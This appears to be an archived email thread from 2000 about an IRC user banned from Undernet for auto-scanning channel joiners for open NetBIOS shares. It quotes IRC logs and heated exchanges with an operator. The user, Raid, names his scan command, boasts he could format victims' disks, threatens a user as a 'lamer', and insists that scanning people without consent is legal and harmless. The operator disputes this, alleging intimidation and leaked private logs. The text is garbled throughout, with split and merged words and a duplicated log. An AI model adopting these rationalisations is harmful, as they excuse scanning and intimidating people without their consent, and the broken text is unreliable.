If I was immature as you seem to think, I'dhave chewed his hard disk up right before his eyes,and said nothing.<CiCi> *shrug*<CiCi> ahhh so he "smarted off" so you thought you' dput him in his place? that's typically something akid does<Raid> a kid?<Raid> No mam, A kid would have formatted him thesecond they were told an open share was found.<Raid> or stolen data or something.<Raid> I told him about it, and since he was being awiseass; I told everybody in the process.<CiCi> pftt<CiCi> that was very nice of you...... not<CiCi> and that's my point<Raid> would it have been nicer not to tell him?<Raid> so somebody WITH the intention of harm couldtake advantage?<CiCi> would have been more civil if you hadn't tri edto act l33t with him<Raid> I didn't try to act l33t. <CiCi> and because you decided to show off and make a
fool of someone, you made a mess<Raid> I made no such mess, A misunderstanding of w hatexactly I did made a mess.<Raid> Chaplain I bet didn't mention we go way backdid he?<Raid> I didn't show off, I already had the blastedprivmsg typed... He decided to be a wise one... So Icancelled it, and wrote a new one.<CiCi> alot of people can hack, most of us don't, a ndmost of us are mature enough not to have a temper f itand announce a problem<CiCi> enough<Raid> Alright, fine. You don't believe me.. That'sperfectly ok. All you need to do is check ANY searc hengine (or even micrsoft) for the fix for thisproblem.<Raid> they'll even tell you it's not a hack.<Raid> it's a bug.<CiCi> most invasions are bugs<Raid> erm, I didn't invade him. Script checked foropen shares, didn't establish connection or mapanything.<Raid> it's no more intrusive then proxy scans. Use rsdon't even notice it, and it doesn't show up as anattack on any firewalls either; because it isnt.<CiCi> *sigh* I'm finished with this now, you're wr ongto threaten people, end of story<Raid> ugh... Well, checkout what I said if you get achance.<Raid> and goodnight n stuff.
Please deal with her, I don't like being klined forBullshit. Thank YOu kindly.
From L. Maurer Sat Sep 9 10:51:29 2000 X-Apparently-To: [email protected] via web1609.mail .yahoo.com Received: from mail.airmail.net (206.66.12.40 ) by mta223.mail.yahoo.com with SMTP; 09 Sep 2000 12:54:17 -07 00 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp f or <[email protected]> sender: <[email protected]> id <mT/[email protected] >; Sat, 9 Sep 2000 12:49:17 -0500 (CDT) Message-Id: <3.0.32.20000909125128.0283b380@mai l.iadfw.net> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 09 Sep 2000 12:51:29 -0500 To: John Grahms <[email protected]> From: "L. Maurer" <[email protected]> | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version:
1.0 Content-Type: text/plain; charset="us-ascii" Content-Length: 10041
Add Addresses
You were removed because you were actively scanning others machines as theyjoined the channel, invading those machines when po ssible, and pastingtheir private chat logs back to them. You have bee n asked to stop doingthis for over 24 hours and the requests were met wi th an attitude from youthat you were very much entitled to invade and comp romise machines whensomeone irritated you on Undernet. Don't think for one minute that this iseither legal or appreciated using Undernet bandwidt h. If this is repeatedby you when your gline expires, expect another one .
Ci_CiAdmin. Dallas.TX.US.Undernet.Org
At 10:07 AM 9/9/00 -0700, you wrote:>Hi there. I thought you might like to know you hav e>one stupid ircop on undernet. Not only is she stup id,>but it's impossible to explain anything to her.>>Her name is CiCi, and I just got klined for "hacki ng".>Full log follows. If you could deal with this for me,>I'd appreciate it.>>Banned *@kpt-c-205-245-107-244.chartertn.net[1] un til>Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this i s>not a playground for you to port scan and invade>other's machines .>>Heres my kline (I went out to get some food, she>klined me when I left) Heres the log of all channe l>activity up to my kline.>[12:25] *** Now talking in #CHristian>[12:25] -logos3- http://www.forchrist.net - channe l>website, for rules and other info.>[12:25] <Raid> mornin>[12:26] *** LC>([email protected]) has>joined #CHristian>[12:26] *** Txico>([email protected]) Quit (P ing>timeout for Txico[cpt-dial-196-30-182-178.mweb.co. za])>[12:26] <CiCi> ok everyone, when Raid's in the>channel, all your machines are going to be scanned so>be prepared>[12:27] * CiCi waits for Raid to meet her router t hat>doesn't appreciate script kiddie probes>[12:27] <Raid> CiCi: Actually, I've turned the scr ipt
>off.>[12:28] <Raid> CiCi: I didn't want to risk having to>explain what netbios open shares are again. ;p>>And heres the wonderful log last night of us chatt ing.>This is a long read, but it seriously shows little>intelligence on her part. Where did you get this l ady?>>>Session Start: Fri Sep 08 23:01:35 2000>Session Ident: CiCi ([email protected])>>/whois cici>CiCi is [email protected] * God Can!>CiCi on #christian >CiCi using dallas.tx.us.undernet.org www.airmail.n et>CiCi is an IRC Operator>cici End of /WHOIS list.>><CiCi> why?><Raid> I don't think you quiet understand what you>erm, reported me for. heh><Raid> Mr chaplain had open shared drives. I didn' t do>anything to him, I told him it was there; I even>directed him to a website for zone alarm. (firewal l;>fixes that problem)><Raid> I told him if I was a jerk as he said, I wo uld>have formatted him.><Raid> I didn't do so. hehe><Raid> I didn't "hack" him or anything.><Raid> His computer isn't setup properly.><Raid> His entire c: drive is wide open to anybody ;>even you.><CiCi> ok, let me go read these logs again with th at>in mind, brb><Raid> So when I'm contacted by the authorities, ( they>already know about this serious security problem.. )>they'll probably get a chuckle out of it. As I tol d>chaplain he had this problem, if I was a jerk; I>wouldn't have said a word.. just done mean things to>him.><Raid> thanks.><CiCi> [13:29] (Raid): LC: So consider that a thre at,>lamer.[13:29] (Raid): LC: So consider that a threa t,>lamer.><Raid> Are you going to use the entire log, or out of>context?><Raid> I have no need to threaten CiCi. I could ha ve>kept my mouth shut.><Raid> then anybody (even you) could access his en tire>system.><Raid> and use it like you were sitting at the>keyboard.><Raid> I thought he might like to know about it.><Raid> Next time I find somebody has this problem. ..>shrug, I'll just keep quiet. I had no idea you did n't>know about this serious problem with windows machi nes.><Raid> NT suffers from it as well.><Raid> in fact, everytime you reboot; unless you>manually set it otherwise, drive c: is shared as o pen,>with admin rights, no password.><Raid> listen, if you really don't believe me, You can>ask anybody you trust with computer knowledge to>checkout this log of our chat.
><Raid> I'm not bsing you.><Raid> I was trying to save you some shame is all.><Raid> (My boss thought it was funny as hell.)><CiCi> you were trying to save me from shame?><CiCi> heh><Raid> erm, embarrasment rather><Raid> it's not normal for an admin to not underst and>shared drives. ;p><Raid> and you are an administrator. hehe><CiCi> if your boss had a copy of your logs I don' t>think he'd think your actions were funny><Raid> Admins are supposed to know these things, a nd>if they don't check it out first.><Raid> Actually, he was standing beside me the ent ire>convo; including the one with chaplain.><CiCi> if you were trying to help, that's one thin g,>but you were threatening and that's not right><Raid> He didn't believe me when I told him YOU we re>an ircop of undernet.><CiCi> if you recall, you tried that same mess on me>when you first met me><Raid> I had to /whois and show him your "is an ir cop">thingie.><Raid> Listen, I had access to his computer, why>threaten? Nothing he could do at that point. he wa s>mine for the kill if I wanted it.><Raid> Instead, I told him he had a problem.><Raid> and explained (which you did take out of>context) that if I was a jerk, I could easily form at>/u his hard disk, or even quicker, nuke his fat or>registry.><CiCi> why were you looking anyway?><Raid> oh and btw, I'm not a teenager; or a script>kiddy, I don't have any reason to bs you. I'm>perfectly capable of backing up what I say.><Raid> I wasn't.><Raid> My script autoscans people on joins, much l ike>undernet does for open proxies.><Raid> You might want to recommend undernet do thi s>scan hehe><Raid> it's even more serious to a users data then an>open proxy.><CiCi> uhm no><CiCi> undernet isn't a nanny service><Raid> Shrug, as I said... if you don't know about>something, Check it out before accusing me of doin g>something bad. I've been clean for almost 8 months .>Haven't hacked a single thing.><CiCi> the only things we look for are things that>damage this network on a large scale><CiCi> the admins would NEVER agree to such scans as>yours done to all guests><Raid> if they all knew about the bug in windows, I>bet you they would.><CiCi> now, I"m tired of you insulting me><Raid> I'm sure some of you ircops login with wind ows>boxes.><Raid> I'm not trying to insult you.><Raid> Actually I find you one of the cooler ircop s>i've talked too.><Raid> I realize I may sound like a smartass; But it's>seriously not intentional.><Raid> I simply want to resolve this issue with yo u.
><Raid> I'm not worried about the authorities.><Raid> I just don't like people thinking I've done>something i didn't is all.><CiCi> you scanned someone's machine and then said><CiCi> [13:29] (Raid): LC: So consider that a thre at,>lamer.><Raid> My script scanned him when he joined.><CiCi> I haven't changed my opinion of your immatu re>behavior><Raid> hmmm><CiCi> if you honestly wanted to help people by do ing>this, you wouldn't call them lamers><Raid> Did you get the entire log, or just what I said>to him?><CiCi> do you have any clue what percentage of our>undernet guests I could call lamers?><Raid> IE: the first thing he said to me?><CiCi> alot of them, but I don't><Raid> I was minding my own business, he smarted o ff.>I decided to tell him in open channel (I was writi ng>/msg to him) that he had a problem.><CiCi> perhaps a lack of communication skills is t he>problem, I don't now, but I do know that what you did>was not good><Raid> If I was immature as you seem to think, I'd>have chewed his hard disk up right before his eyes ,>and said nothing.><CiCi> *shrug*><CiCi> ahhh so he "smarted off" so you thought you 'd>put him in his place? that's typically something a>kid does><Raid> a kid?><Raid> No mam, A kid would have formatted him the>second they were told an open share was found.><Raid> or stolen data or something.><Raid> I told him about it, and since he was being a>wiseass; I told everybody in the process.><CiCi> pftt><CiCi> that was very nice of you...... not><CiCi> and that's my point><Raid> would it have been nicer not to tell him?><Raid> so somebody WITH the intention of harm coul d>take advantage?><CiCi> would have been more civil if you hadn't tr ied>to act l33t with him><Raid> I didn't try to act l33t. ><CiCi> and because you decided to show off and mak e a>fool of someone, you made a mess><Raid> I made no such mess, A misunderstanding of what>exactly I did made a mess.><Raid> Chaplain I bet didn't mention we go way bac k>did he?><Raid> I didn't show off, I already had the blaste d>privmsg typed... He decided to be a wise one... So I>cancelled it, and wrote a new one.><CiCi> alot of people can hack, most of us don't, and>most of us are mature enough not to have a temper fit>and announce a problem><CiCi> enough><Raid> Alright, fine. You don't believe me.. That' s>perfectly ok. All you need to do is check ANY sear ch>engine (or even micrsoft) for the fix for this>problem.
><Raid> they'll even tell you it's not a hack.><Raid> it's a bug.><CiCi> most invasions are bugs><Raid> erm, I didn't invade him. Script checked fo r>open shares, didn't establish connection or map>anything.><Raid> it's no more intrusive then proxy scans. Us ers>don't even notice it, and it doesn't show up as an>attack on any firewalls either; because it isnt.><CiCi> *sigh* I'm finished with this now, you're w rong>to threaten people, end of story><Raid> ugh... Well, checkout what I said if you ge t a>chance.><Raid> and goodnight n stuff.>>Please deal with her, I don't like being klined fo r>Bullshit. Thank YOu kindly.>>>>__________________________________________________>Do You Yahoo!?>Yahoo! Mail - Free email you can access from anywh ere!>http://mail.yahoo.com/>From John Grahms Sat Sep 9 16:06:45 2000 Received: from [205.245.105.248] by web1610.ma il.yahoo.com; Sat, 09 Sep 2000 16:06:45 PDT Date: Sat, 9 Sep 2000 16:06:45 -0700 (PDT) From: John Grahms <[email protected]> | Block address Subject: Re: [Abuse] Hello To: Gator <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 1641
Add Addresses
--- Gator <[email protected]> wrote:> File shares were not a big problem in the past wh en> users were mostly on> modems. Windows would warn you if you enabled fil e> sharing on your modem.> However, today in the world of cable and dsl, the se> devices usually use> network cards, the same is not true. Windows not> only does not warn you if> you enable file shares on your network card> device(s), but with the default> bindings and filesharing installed you are> vulnerable. Your drives are open> to the public and there are quiet a few virii and
> trojans that actually> exploit this to spread.>> So in short the man is right about it being a> problem. I have no idea what> he did with that information however.
I told the user he had a problem, and suggested he getZone alarm firewall; I've got those logs too if youshould need them. I did NOT at any time access hismachine, nor map any drives to mine. I was informed hewas vulnerable; I told him.
I tried to explain this to CiCi, but she clearlycouldn't understand such a simple concept of tellin gsomebody they have a real serious problem.
I did NOT attack mr chaplains computer at any time,and she didn't gline me last night. She glined metoday; She had plenty of time to gline last night.Regardless, her gline wasn't valid. I did not use t heinformation that my script told me about for anythi ngbad, And I'd appreciate it if yuo could explain thi sto her, so I don't have to deal with this BS.
From John Grahms Sat Sep 9 17:18:10 2000 Received: from [205.245.105.248] by web1604.ma il.yahoo.com; Sat, 09 Sep 2000 17:18:10 PDT Date: Sat, 9 Sep 2000 17:18:10 -0700 (PDT) From: John Grahms <[email protected]> | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" <[email protected]> CC: [email protected] MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-1600515 28-968545090=:19289" Content-Length: 111621
Add Addresses
--- "L. Maurer" <[email protected]> wrote:> You were removed because you were actively scanni ng> others machines as they joined the channel,invading > those machines when possible, and pastin g> their private chat logs back to them.
Incorrect. and I have logs not only from me to prov ethis, but from others present during the convo. You rdefiantly in the wrong. I did not invade ANY machin es,and i'd love to see your proof stating otherwise. I 'msure my boss would as well. Being as he was present
during the initial conversation with Chaplain. Even heknew about the shared drives problem on windowsmachines. He did not believe me when I told him youwere an Oper on undernet; I actually had to /whois youto show him it! My script didn't do anything harmfu lto anyones machine. And I didn't do anything harmfu lwith the information it told me either, I informedusers they had a problem if it found one, and Isuggested they obtain Zone Alarm firewall.
> You have been asked to stop doing> this for over 24 hours and the requests were met
Oh really? That's not exactly true, now is it. Thesecond I logged in today (as the log of today shows , I've attached it to this message) you made a publiccomment about me scanning people (not exactly true,nor correct) I responded and plainly told you I hadturned the script off, because I was tired ofexplaining shared drives to people. Actually, your thefirst who didn't know about the problem. Since Mylittle run in(which I sent to abuse@undernet) with yuolast night. I then set away.. I was gone maybe 16minutes.. I went to get some food at Burger king...When I came back, YOU GLINED me. I flat out told yo uthe script was no longer active; YOU THEN GLINED MEAFTER I left. Nah, I didn't do anything againstundernet policy CiCi, and you damn well know it.
> with an attitude from you that you were very much >entitled to invade and compromise machines when
Not true. You said in channel that I was hacking (Ihave that log too) chaplain. You also informed me Ihad been reported to the authorities; and should beexpecting a call from his lawyer soon. I'm stillwaiting for that call btw.
> Don't think for one minute that this is eitherlegal > or appreciated using Undernet bandwidth.
Real network aware one you are... I wasn't usingundernet bandwidth running my script...And what myscript was doing is damn sure not illegal. Unless y ourgoing to tell me undernets proxy scans of me everyt imeI connect is also illegal? I didn't do anythingdifferent. I didn't map any of his drives to mysystem. (I only knew that he had that available). Iwas nice enough to tell him he had a problem.
> If this is repeated by you when your gline expir es,> expect another one.
LOL! Fine. Expect an email with logs [email protected] everytime you do so. I'm not oneusually for getting glines. Nice try, CiCi.
It's obvious you have a personal problem with me,That's fine. Still not a reason for you to abuse yo urown networks policy and gline me for it Glining mefrom your server would be different, but... Persona l
problems can easily be resolved via ignore. Not tomention the fellow you glined last night for sweari ngin a channel you don't even op in. I've got that lo gtoo ;p
I've also heard from others (and I'm sure they havelogs) that you've been abusing your Oline for sometime now. glining people for channel matters; Of wh ichyou have no status in. Just because you "hangout" i n achannel doesn't give you the right to gline peoplefrom the entire undernet; Thats what the channel ha sops for.
I carbon copied this email to Gator, I simply don'ttrust you enough to send him copies of this entireemail. You quoted me out of context once already.
The log file is kinda large; scroll down for therelevant info.
__________________________________________________Do You Yahoo!?Yahoo! Mail - Free email you can access from anywhe re!http://mail.yahoo.com/
> Gator
From L. Maurer Sun Sep 10 13:03:41 2000 X-Apparently-To: [email protected] via web1602.mail .yahoo.com Received: from mail.airmail.net (206.66.12.40 ) by mta116.mail.yahoo.com with SMTP; 10 Sep 2000 13:18:21 -07 00 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp f or <[email protected]> sender: <[email protected]> id <mT/[email protected] >; Sun, 10 Sep 2000 15:01:52 -0500 (CDT) Message-Id: <3.0.32.20000910150340.00ce3410@mai l.iadfw.net> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 10 Sep 2000 15:03:41 -0500 To: John Grahms <[email protected]> From: "L. Maurer" <[email protected]> | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Length:
5115
Add Addresses
At 05:18 PM 9/9/00 -0700, John Grahms wrote:>Incorrect. and I have logs not only from me to pro ve>this, but from others present during the convo. Yo ur>defiantly in the wrong. I did not invade ANY machi nes,>and i'd love to see your proof stating otherwise.
Then explain how you were pasting back private chat logs that Chaplain hadwith others :/ When I first chatted with you about this, you told me youwouldn't have done anything to him but because he w as a smart alec, orsomething of that nature, you thought you were with in your right to dothis. Just because you CAN hit a child doesn't mean it's the proper thingto do and most of our undernet guests are virtual c hildren. We don't takeadvantage of that fact.
>>Not true. You said in channel that I was hacking ( I>have that log too) chaplain.
I'm not Chaplain. Get your people straight. There is more than one personhere who has been effected by your actions and AFAI K Chaplain isn't readingthis email.
>You also informed me I>had been reported to the authorities; and should b e>expecting a call from his lawyer soon. I'm still>waiting for that call btw.
I told you nothing of the sort. Once again, get you r people straight. It ismy understanding that Chaplain has contacted his ch urch's attorney and thatsince you both live in the same state, there is mer it for suit. That's allI know about that and that's all I want to know abo ut it.
>>Real network aware one you are... I wasn't using>undernet bandwidth running my script...And what my>script was doing is damn sure not illegal. Unless your>going to tell me undernets proxy scans of me every time>I connect is also illegal? I didn't do anything>different.
OK, if you weren't using undernet bandwidth, explai n how you knew theIP/host information of the people you were scanning . You were scanningeveryone that entered a channel on Undernet without their consent. The"consent" part is the difference between your scans and the proxy scans
Undernet does. If you read the motd of most servers , you'll see that it isdiscussed there. If users don't want to be scanned for the most commonlyabused ports being open, they are free to disconnec t to Undernet. You madenone of this information available to people who en tered the channel andyou had no permission from them to scan their machi nes.
>I didn't map any of his drives to my>system. (I only knew that he had that available). I>was nice enough to tell him he had a problem.>
Calling someone a lamer doesn't sound like my idea of nice and telling themto "consider this a threat" doesn't sound very kind either.
>It's obvious you have a personal problem with me,>That's fine. Still not a reason for you to abuse y our>own networks policy and gline me for it Glining me>from your server would be different, but... Person al>problems can easily be resolved via ignore.
I don't have a personal problem with you so the res t of the above paragraphis of no concern. My problem with you was that you were sitting on Undernetscanning the machines of each person joining a chan nel.
>Not to>mention the fellow you glined last night for swear ing>in a channel you don't even op in. I've got that l og>too ;p>>I've also heard from others (and I'm sure they hav e>logs) that you've been abusing your Oline for some>time now. glining people for channel matters; Of w hich>you have no status in. Just because you "hangout" in a>channel doesn't give you the right to gline people>from the entire undernet; Thats what the channel h as>ops for.>
I was told yesterday that I had been accepted as an Op in #christian. Ihave now declined that offer until this matter is s ettled. Once again,scanning for open ports and then intimidating the m achine owner when theysay something you dislike borders on extortion and it's certainly notsomething I can sit by and idly watch. If you weren 't on undernet, youwouldn't know who joined the channels here.
>I carbon copied this email to Gator, I simply don' t>trust you enough to send him copies of this entire>email. You quoted me out of context once already.
I've carbon copied him on this as well. Gator is a very good person and
does many things for Undernet that he never gets pr aise he deserves. Whatyou may not be aware of is that both Gator and I go t copies of Chaplianslog files sent to abuse the day before. We both hav e access to the chatlong in full context. We both read email sent to ab [email protected]
>>The log file is kinda large; scroll down for the>relevant info.
Many of us who work on the net do not open attachme nts for obvious reasons.I'm sure there is nothing malicious in your logs, b ut it's just a rule ofthumb we use to avoid problems.
The reason I got involved in this was because you w ere not only scanningpeople without permission as they entered that chan nel, but also becauseyou were using the information from those scans to threaten people whenthey did not behave in the manner you desired. If you have indeed stoppedscanning people as they enter a channel, you have s olved the problem thatwas my issue.
CiCiFrom John Grahms Sun Sep 10 20:58:49 2000 Received: from [205.245.105.248] by web1603.ma il.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT ) From: John Grahms <[email protected]> | Block address Subject: Re: [Abuse] Hello To: "L. Maurer" <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Length: 10980
Add Addresses
--- "L. Maurer" <[email protected]> wrote:
> Then explain how you were pasting back private ch at> logs that Chaplain had with others :/ When I fir st You care to back this up with some Evidence CiCi? A nylogs created by my machine are available for my use ;You don't have any say with that I do with material Ilog. You don't own not one single file present on m ymachine, and that includes logs of us chatting. I l ogfor a reason, and this my dear is one of them.
> this, you told me you wouldn't have done anything to> him but because he was a smart alec, or something of> that nature, you thought you were within your rig ht> to do this.
You can't tell me "don't be a smartass" to someone,Sorry. It's not illegal nor against undernet policy totreat somebody with less then perfect respect. Gonanny somebody else.
> Just because you CAN hit a child doesn't mean> it's the proper thing to do and most of ourundernet > guests are virtual children. We don't ta keadvantage > of that fact.
I didn't hit anybody. And I'm getting pretty sick a ndtired of your bullshit excuses CiCi. Admit it, Youdon't like me, so You gline me.
> I'm not Chaplain. Get your people straight. Ther e> is more than one person here who has been effect ed> by your actions and AFAIK Chaplain isn't reading> this email.
You wanna back this one up as well Please? I likeevidence, I'm a strong believer in it. The more BS youtalk (which btw, you can't actually backup) the les srespect I have for you.
> I told you nothing of the sort. Once again, get y our> people straight.
OH YES, Yes you did. I have that Log at work; I sha llretrieve it. You made it perfectly clear in your ow nwords that I had been reported (laugh laugh) to theauthorities for my "hacking" chaplain.
> It is my understanding that Chaplain has contacte d >his church's attorney and that since you both live >in the same state, there is merit for suit.
Cici, I've been as patient and forgiving as I'm goi ngto be. The rest of this email may be rude; I'm nottrying any longer to make it not be. Had you looked atall on the laws governing this state; Chaplain hasn 'tgot a pot to piss in. However, I can and will win acounter suit; Although I know churches don't have a lotof money, I'll counter sue for the point of it.> OK, if you weren't using undernet bandwidth, expl ain> how you knew the IP/host information of the peopl e *yawn* Remember when I said I had lost my patience?Well, get ready for a computer lesson; Seems damn t imesomebody told you. It doesn't use undernet bandwidt hto /whois someone, nor does it really do anything w henyou /dns somebody. My script didn't use any of yourprecious bandwidth, because (oh dense one) itestablishes direct connection via a socket call. Sh allI get any more technical, or can you understand thi s?
> their consent. The> "consent" part is the difference between your sca ns
> and the proxy scans Undernet does. If you read th e >motd of most servers, you'll see that it is discuss ed> there.
Indeed I have, and guess what. If somebody reallywanted to "sue" undernet for scanning them, your mo tdwouldn't do shit for you. Know why? Because it's li kea shrinkwrap software license; It won't actually ho ldup in court. But it sounds good.
> to Undernet. You made> none of this information available to people who> entered the channel and you had no permission fro m >them to scan their machines.
Technically, I didn't scan anybody. Second, I don'tactually need their permission to scan them. It's n otillegal to port scan any machine you desire. Itbecomes illegal if you attempt to gain unauthorizedentry into the machine once you have scanned It.scanning is like knocking on the door or callingsomebodys house to see if there home. For an ircop,You really don't know much about the internet, nor thelaws gonverning it.
> Calling someone a lamer doesn't sound like my ide a> of nice and telling them to "consider this athreat" > doesn't sound very kind either.
Still quoting me out of context? :) Why don't youemail us a copy of the entire log cici, so we can p utit in the proper context. I was nice enough to tellhim he had a problem to begin with; You seem to hav e avery hard time with this very very simple concept. Ireally don't know what to think of you anymore. Ialready know your computer knowledge leaves much to bedesired, and in my opinion; You aren't qualified to bean ircop.
But lucky for you, It's not in my power to make tho sedecisions.
> I don't have a personal problem with you so the r est> of the above paragraph is of no concern.
I'm not letting you wiggle out of this CiCi. Glinin gme went a little too far. According to the wonderfu lchristian log, You glined me after I had already to ldyou (after your attempt to start shit with me when Ijoined) that the script was no longer scanninganybody. I set away to get some food, then you glin edme. You can't get out of it. That's how it went dow n,and you know it.
> My problem with you was that you were sitting on >Undernet scanning the machines of each person joini ng> a channel.
I'm an op in several security related channels, It isour channels policy to scan all visitors; or they a renot welcome. My script does not currently distinqui sh
between only those channels and all channels I migh tbe visiting in. However, it is to be said; You andChaplain are the ONLY people I've scanned and infor medthey had a problem that weren't happy to know. Theysay I suppose that ignorance is bliss, but in thecomputer age; this will kill you.
Your problem with me is a personal one, Otherwise y ouwould not have glined me yesterday; As you knew wel linfact that I was no longer scanning anybody (As I hadtold you). How do you defend that gline anyway CiCi ?What undernet rule at the time was I in violation o f?Please, enlighten me :)
> I was told yesterday that I had been accepted as an> Op in #christian.
I don't know. I was speaking with the channeladministrator; He assured me I'd have no furtherproblems from you. :) Whether your op status isaffected isn't my concern, I just don't want any mo rehassle from you. I know you've overstepped yourauthority, and you know it.
> I have now declined that offer until this matter is> settled.
The matter can easily be settled, Don't gline me fo rbullshit, and apologize for the bullshit gline you didset on me, and I'll drop the entire issue.
> Once again, scanning for open ports and then >intimidating the machine owner when they say >something you dislike borders on extortion and it's I didn't scan for open ports. Computer lesson numbe r 2(seems you can't learn any other way, I am forced t obe rude) my script sent net view ''$ip one time, wh ichattempts to connect to port 139; For Netbiosinformation, NOT OOB nuking. I already know this isabove you, But I'm going to explain exactly what I didanyway; Just because it's beyond you doesn't meansomebody else reading this email won't understand w hatI'm talking about.
And again, I must ask you to provide proof that I w asintimidating anybody. Sigh, I lose more and morerespect for you with each email me thinks. I don'textort anybody.
> If you weren't on undernet, you wouldn't know who >joined the channels here.
I've been a regular on undernet for several years.I've never had a problem like this before. And it'snot really a problem... You had no valid reason togline me, and you did; And I'm going to press thisissue until it's resolved. If that means I have tomake you look like a total idiot with regard tocomputers, I'll do so (mind you, it wouldn't take a nyeffort; These emails and the logs I have show itwithout a doubt). A wrong must be righted.
CiCi, You know your gline was not legit. You know i t.
I know it. Why don't you apologize for doing it? Itseems like a christian thing to do.
> I've carbon copied him on this as well. Gator is a> very good person and does many things for Underne t >that he never gets praise he deserves.
I've known gator for sometime, he knows someassociates I used to frequent with. WarBlade andcrew...
> What you may not be aware of is that both Gatorand > I got copies of Chaplians log files sent toabuse > the day before. We both have access to thechat
Then why are you still quoting it out of context? Ididn't do anything illegal to Chaplain; I may havesaved him some serious downtime. I do admit tho, If Ihad known I'd be in this BS for doing it, I'd have notsaid not one word. In the future, I'll keep my mout hshut. Ignorance is bliss, right? :)
> Many of us who work on the net do not open> attachments for obvious reasons.
A LOG file is a text file, opening it in notepad wi llnot infect you. Please don't force me to give you alesson in virus terminology. I have very goodwithstanding creditials in that field. How many"scriptkiddys" (thats what you called me once right ?;p) do you know in Rolling Stone magazine? :-)
> I'm sure there is nothing malicious in your logs,> but it's just a rule of thumb we use to avoid>problems.
Lack of education creates rules that are sometimes notnecessary.
> The reason I got involved in this was because you> were not only scanning people without permission as> they entered that channel
(a) I don't need their permission. and (b) I don'teven have to tell them either beforehand or after t hatI scanned them. And I don't scan people.
> but also because you were using the information f rom> those scans to threaten people when they did not >behave in the manner you desired.
Nice try! I didn't threaten anybody; I helped hissorry ass out. I didn't use any of the information inany illegal nor immoral manner. I did a christianthing a told the bastard he had a problem. I shouldhave let him suffer with it. Stupidty seems to beuncurable.
> If you have indeed stopped
> scanning people as they enter a channel, you have> solved the problem that was my issue.
Your "issue" isn't of any concern to me anymore. Yo urgline and abuse of oline is. You glined me after Ialready told you I stopped, thats just plain outrig htwrong. I wasn't doing anything against undernet pol icyto begin with, but to gline me after I already said Iwasn't doing it anymore is bullshit. Espicially sin ceyou didn't gline me on entry, you said a wiseasscomment about me in open channel. When I responded Iwas glined shortly there after. And I bet without adoubt; it had nothing whatsoever to do with chaplai n.I strongly suspect you didn't like my response to y ourwiseass comment.
If theres a lesson to be learned here, it's to allo wthe stupid and ignorant to remain that way; It's fo rthe best.
Regards,Raid
PS: I didn't have time to enter gators email; I'mtrusting you to send him this intact... See if you cando that. Ok?
__________________________________________________Do You Yahoo!?Yahoo! Mail - Free email you can access from anywhe re!http://mail.yahoo.com/
From L. Maurer Sun Sep 10 21:17:04 2000 X-Apparently-To: [email protected] via web1601.mail .yahoo.com Received: from mail.airmail.net (206.66.12.40 ) by mta430.mail.yahoo.com with SMTP; 11 Sep 2000 02:00:47 -07 00 (PDT) Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp f or <[email protected]> sender: <[email protected]> id <mT/[email protected] >; Sun, 10 Sep 2000 23:15:13 -0500 (CDT) Message-Id: <3.0.32.20000910231703.01ca0340@mai l.iadfw.net> X-Sender: [email protected] X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 10 Sep 2000 23:17:04 -0500 To: [email protected] From: "L. Maurer" <[email protected]> | Block address Subject: Re: [Abuse] Hello CC: [email protected] Mime-Version:
1.0 Content-Type: text/plain; charset="us-ascii" Content-Length: 12373
Add Addresses
Here's a copy of this kid's latest crap. I've had enough of this. Sittingin a channel and port scanning everyone who joins i s not a good thing.Continuing his arguement with me about it is totall y stupid.
Lisa
>X-Persona: <lmaurer>>Return-Path: <[email protected]>>Received: from web1603.mail.yahoo.com from [128.11 .23.203] bymail.airmail.net > (/\##/\ Smail3.1.30.16 #30.438) with smtp f or <[email protected]> sender:<[email protected]>> id <mP/[email protected]>; Su n, 10 Sep 2000 22:45:07 -0500(CDT)>Received: (qmail 26157 invoked by uid 60001); 11 S ep 2000 03:58:49 -0000>Message-ID: <[email protected] il.yahoo.com>>Received: from [205.245.105.248] by web1603.mail.y ahoo.com; Sun, 10 Sep2000 20:58:49 PDT>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)>From: John Grahms <[email protected]>>Subject: Re: [Abuse] Hello>To: "L. Maurer" <[email protected]>>MIME-Version: 1.0>Content-Type: text/plain; charset=us-ascii>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -05 00 (CDT)>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -05 00 (CDT)>>>--- "L. Maurer" <[email protected]> wrote:>>> Then explain how you were pasting back private c hat>> logs that Chaplain had with others :/ When I fi rst >You care to back this up with some Evidence CiCi? Any>logs created by my machine are available for my us e;>You don't have any say with that I do with materia l I>log. You don't own not one single file present on my>machine, and that includes logs of us chatting. I log>for a reason, and this my dear is one of them.>>> this, you told me you wouldn't have done anythin g to>> him but because he was a smart alec, or somethin g of>> that nature, you thought you were within your ri ght>> to do this.>>You can't tell me "don't be a smartass" to someone ,
